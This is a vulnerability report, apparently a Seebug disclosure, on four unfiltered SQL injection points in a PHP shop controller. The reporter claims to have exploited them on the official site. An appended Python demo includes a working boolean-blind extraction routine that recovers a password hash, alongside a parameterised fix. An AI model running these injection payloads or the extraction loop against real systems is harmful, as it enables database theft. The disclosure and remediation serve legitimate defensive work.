### Brief description:
I only looked at two files. Tested successfully against the official site.
### Details:
`protected\controllers\simple.php`
1
```php
public function order_info(){
    $id = Filter::int(Req::args('id'));   // filtered to an integer
    $product_id = Req::args('pid');       // raw request value, no filtering
    $type = Req::args("type");
    if($this->checkOnline()){
        if($type=='groupbuy'){
            $model = new Model("groupbuy as gb");
            // $product_id is concatenated into the WHERE clause unquoted
            $item = $model->join("left join goods as go on gb.goods_id=go.id left join products as pr on pr.goods_id=gb.goods_id")->fields("*,pr.id as product_id,pr.store_nums")->where("gb.id=$id and pr.id=$product_id")->find();
```
`pid` is not filtered and is used without single quotes, so it can be injected directly. Database errors are not echoed to the client, so only blind injection is possible; run it through a tool.
Official site:
![tt1.jpg](https://images.seebug.org/upload/201406/22074043480903bed7e4289713db06de41ff2564.jpg)
2
```php
public function order_status(){
    if($this->checkOnline()){
        $order_id = Req::get("order_id");   // raw GET value, no filtering
        if($order_id){
            // $order_id is concatenated into the WHERE clause unquoted
            $order = $this->model->table("order as od")->join("left join payment as pa on od.payment= pa.id")->fields("od.id,od.order_no,od.payment,od.pay_status,od.order_amount,pa.pay_name as payname,od.type")->where("od.id=$order_id and od.status<4 and od.user_id = ".$this->user['id'])->find();
            if($order){
```
`order_id` is not filtered; blind injection as well.
3
```php
public function order_act(){
    if($this->checkOnline()){
        $address_id = Filter::int(Req::args('address_id'));
        $payment_id = Filter::int(Req::args('payment_id'));
        $prom_id = Filter::int(Req::args('prom_id'));
        $is_invoice = Filter::int(Req::args('is_invoice'));
        $invoice_type = Filter::int(Req::args('invoice_type'));
        $invoice_title = Filter::int(Req::args('invoice_title'));
        $user_remark = Filter::txt(Req::args('user_remark'));
        $voucher_id = Filter::int(Req::args('voucher'));
        // non-standard promotion info
        $type = Req::args("type");
        $id = Filter::int(Req::args('id'));
        $product_id = Req::args('product_id');   // raw, not filtered
        $buy_num = Req::args('buy_num');
        if(!$address_id || !$payment_id){
            if(is_array($product_id))$product_id = implode('-', $product_id);
            $data = Req::args();
            if(!$address_id) $data['msg'] = array('fail',"You must select a shipping address before confirming the order.");
            else $data['msg'] = array('fail',"You must select a payment method before confirming the order.");
            if($type==null)$this->redirect("order",false,$data);
            else {
                unset($data['act']);
                Req::args('pid',$product_id);
                Req::args('id',$id);
                unset($_GET['act']);
                Req::args('type',$type);
                Req::args('msg',$data['msg']);
                $this->redirect("/simple/order_info",true,Req::args());
            }
            exit;
        }
        // order type: 0 normal order, 1 group buy, 2 flash sale, 3 bundle promotion
        $order_type = 0;
        $model = new Model('');
        // group-buy handling
        if($type=="groupbuy"){
            $product_id = $product_id[0];
            $num = $buy_num[0];
            // the first element of product_id[] is concatenated into the JOIN condition unquoted
            $item = $model->table("groupbuy as gb")->join("left join goods as go on gb.goods_id=go.id left join products as pr on pr.id=$product_id")->fields("*,pr.id as product_id,pr.spec")->where("gb.id=$id")->find();
            $order_products = .....
```
The `product_id` parameter is not filtered: its first array element is embedded unquoted in the `left join products as pr on pr.id=$product_id` condition.
4
```php
public function get_voucher(){
    $page = Req::args("page");
    $amount = Req::args("amount");   // raw request value, no filtering
    $where = "user_id = ".$this->user['id']." and is_send = 1";
    // $amount is concatenated into the WHERE clause unquoted
    $where .= " and status = 0 and '".date("Y-m-d H:i:s")."' <=end_time and '".date("Y-m-d H:i:s")."' >=start_time and money<=".$amount;
```
`$amount` is not filtered.
For all four of the above, register a user and log in; since they are blind injections, just run a tool against them (as shown in the first example).
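All four sinks share one pattern: a request value is concatenated into a WHERE or JOIN condition as an unquoted number, next to values that do go through `Filter::int`, and query errors never reach the client. The following Python is an added example (not code from the page or from the project) that simulates that pattern against a constructed in-memory SQLite database, shows the boolean-blind oracle that a tool relies on to extract data one bit at a time through `pid`, and contrasts it with a hardened variant that coerces the value to an integer and binds it. The table layout, the sample rows and the `user` table are assumptions made for the demonstration; the application's real schema is not on the page.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the shop's tables (sample schema and rows, not the real ones)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE groupbuy (id INTEGER PRIMARY KEY, goods_id INTEGER);
        CREATE TABLE products (id INTEGER PRIMARY KEY, goods_id INTEGER, store_nums INTEGER);
        CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO groupbuy VALUES (1, 10);
        INSERT INTO products VALUES (1, 10, 5);
        INSERT INTO user VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
    """)
    return conn


def order_info_vulnerable(conn, gid, pid):
    """Same shape as order_info(): gid is int-filtered, pid is concatenated raw and unquoted.
    Returns True when a row comes back (the page renders the item) and False otherwise
    (the page shows nothing). No SQL error reaches the caller, so only blind injection works."""
    gid = int(gid)
    sql = ("SELECT gb.id FROM groupbuy AS gb "
           "LEFT JOIN products AS pr ON pr.goods_id = gb.goods_id "
           f"WHERE gb.id={gid} AND pr.id={pid}")
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # errors are swallowed, like an application that does not display them


def order_info_fixed(conn, gid, pid):
    """Hardened form: both values are coerced to int (anything else raises ValueError) and bound
    as parameters, so the query text never contains attacker-controlled characters."""
    gid, pid = int(gid), int(pid)
    sql = ("SELECT gb.id FROM groupbuy AS gb "
           "LEFT JOIN products AS pr ON pr.goods_id = gb.goods_id "
           "WHERE gb.id=? AND pr.id=?")
    return conn.execute(sql, (gid, pid)).fetchone() is not None


def fixed_accepts(conn, pid):
    """True if the hardened endpoint accepts pid, False if it rejects it as a non-integer."""
    try:
        order_info_fixed(conn, 1, pid)
        return True
    except ValueError:
        return False


def extract_blind(conn, subquery, maxlen=64):
    """Boolean-based blind extraction through pid: binary search over the ASCII range costs
    7 requests per character. unicode()/substr() is SQLite syntax; MySQL uses ascii()/substr().
    No quotes are needed anywhere in the payload because the injection point is unquoted."""
    out = ""
    for pos in range(1, maxlen + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # "1" keeps pr.id=1 true; the appended condition decides whether the row is shown
            payload = f"1 AND unicode(substr(({subquery}),{pos},1))>{mid}"
            if order_info_vulnerable(conn, 1, payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # substr() past the end yields '' -> unicode('') is NULL -> every test false
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = build_db()
    print(order_info_vulnerable(db, 1, "1 AND 1=1"), order_info_vulnerable(db, 1, "1 AND 1=2"))
    print(extract_blind(db, "SELECT password FROM user WHERE id=1"))
    print(fixed_accepts(db, "1"), fixed_accepts(db, "1 AND 1=1"))
```

In the PHP controller the equivalent fix is to run `pid`, `order_id`, `product_id[0]` and `amount` through the same kind of numeric filtering the code already applies to `$id` (a decimal filter for `amount`, which is a money value), or to bind them as query parameters rather than concatenating them into the condition string.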
### Proof of vulnerability:
![tt1.jpg](https://images.seebug.org/upload/201406/22074043480903bed7e4289713db06de41ff2564.jpg)